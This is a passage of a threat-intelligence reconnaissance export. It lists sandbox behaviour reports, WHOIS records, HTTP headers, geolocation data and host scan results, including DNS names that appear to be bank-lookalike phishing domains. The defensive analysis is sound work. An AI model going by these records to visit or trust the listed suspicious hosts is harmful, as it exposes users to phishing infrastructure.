non-interlaced"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003384]\n "~DF77AE68F8612CDCE2.TMP" has type "data"- Location: [%TEMP%\\~DF77AE68F8612CDCE2.TMP]- [targetUID: 00000000-00003524]\n "9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1]- [targetUID: 00000000-00003384]\n "iphone_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "4L134F50.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003524]\n "5E42C65D472B356D49EB3B8AD6849196" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\5E42C65D472B356D49EB3B8AD6849196]- [targetUID: 00000000-00003384]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003384]\n "O7UT3CDV.htm" has type "HTML document ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\O7UT3CDV.htm]- [targetUID: 00000000-00003384]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003524]\n "mac_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://macinstruct.sertfidancilik.com/"\n Pattern match: "https://macinstruct.sertfidancilik.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-s |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=*.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Identity Digital Inc. | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | CN=nwapi2.battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.118): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | manuel.ebner@ebnerfamily.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'Curated Live Sessions Preview.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f98_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f98_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f98_ConnHashTable<3992>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"\n "IsoScope_f98_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f98_IE_EarlyTabStart_0x9a8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f98_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "142.250.191.74:443"\n "185.199.108.153:443"\n "207.58.149.159:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df143e17619557ccd4.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{e0e36bb7-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{e0e36bb9-edaf-11ed-be7c-0800275af24e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4659a31bf6bffa2f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003992]\n "slps_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00003992]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "CabD0C8.tmp" has type "data"- Location: [%TEMP%\\CabD0C8.tmp]- [targetUID: 00000000-00002780]\n "splice_1_.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003992]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "~DF4D711661B7A04B97.TMP" has type "data"- Location: [%TEMP%\\~DF4D711661B7A04B97.TMP]- [targetUID: 00000000-00003992]\n "~DF4E28665F3A902F14.TMP" has type "data"- Location: [%TEMP%\\~DF4E28665F3A902F14.TMP]- [targetUID: 00000000-00003992]\n "~DF143E17619557CCD4.TMP" has type "data"- Location: [%TEMP%\\~DF143E17619557CCD4.TMP]- [targetUID: 00000000-00003992]\n "~DF4659A31BF6BFFA2F.TMP" has type "data"- Location: [%TEMP%\\~DF4659A31BF6BFFA2F.TMP]- [targetUID: 00000000-00003992]\n "~DF30EEA2AB51846FC9.TMP" has type "data"- Location: [%TEMP%\\~DF30EEA2AB51846FC9.TMP]- [targetUID: 00000000-00003992]\n "_E0E36BB9-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "RecoveryStore._E0E36BB7-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_E9939342-EDAF-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "_9005BE62-EDB0-11ED-BE7C-0800275AF24E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003992]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002780]\n "4QKL12T1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QKL12T1.txt]- [targetUID: 00000000-00003992]\n "FDR3QYMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FDR3QYMD.txt]- [targetUID: 00000000-00003992]\n "6JPHIXX5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JPHIXX5.txt]- [targetUID: 00000000-00003992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "search_1_.json" has type "JSON data"- [targetUID: 00000000-00003992]\n "splice_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: 00000000-00003992]\n "ZN7JGHLC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZN7JGHLC.txt]- [targetUID: 00000000-00003992]\n "CAGRGPOL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CAGRGPOL.txt]- [targetUID: 00000000-00003992]\n "UIT1QO2U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UIT1QO2U.txt]- [targetUID: 00000000-00003992]\n "W8PZ9GMH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W8PZ9GMH.txt]- [targetUID: 00000000-00003992]\n "CabBAEC.tmp" has type "data"- Location: [%TEMP%\\CabBAEC.tmp]- [targetUID: 00000000-00002780]\n "CabBACB.tmp" has type "data"- Location: [%TEMP%\\CabBACB.tmp]- [targetUID: 00000000-00002780]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002780]\n "urlref_httpqueryfibre.github.iov4splice.css" has type "assembler source ASCII text with very long lines"- [targetUID: 00000000-00003992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00003992]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'HTTPS traffic to "142.250.191.74" on port "443"\n HTTPS traffic to "185.199.108.153" on port "443" |
| 2023-05-12 02:45:53 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:52'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3037::6815:470e', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3037::6815:470e |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/ayhu | ayhu |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", 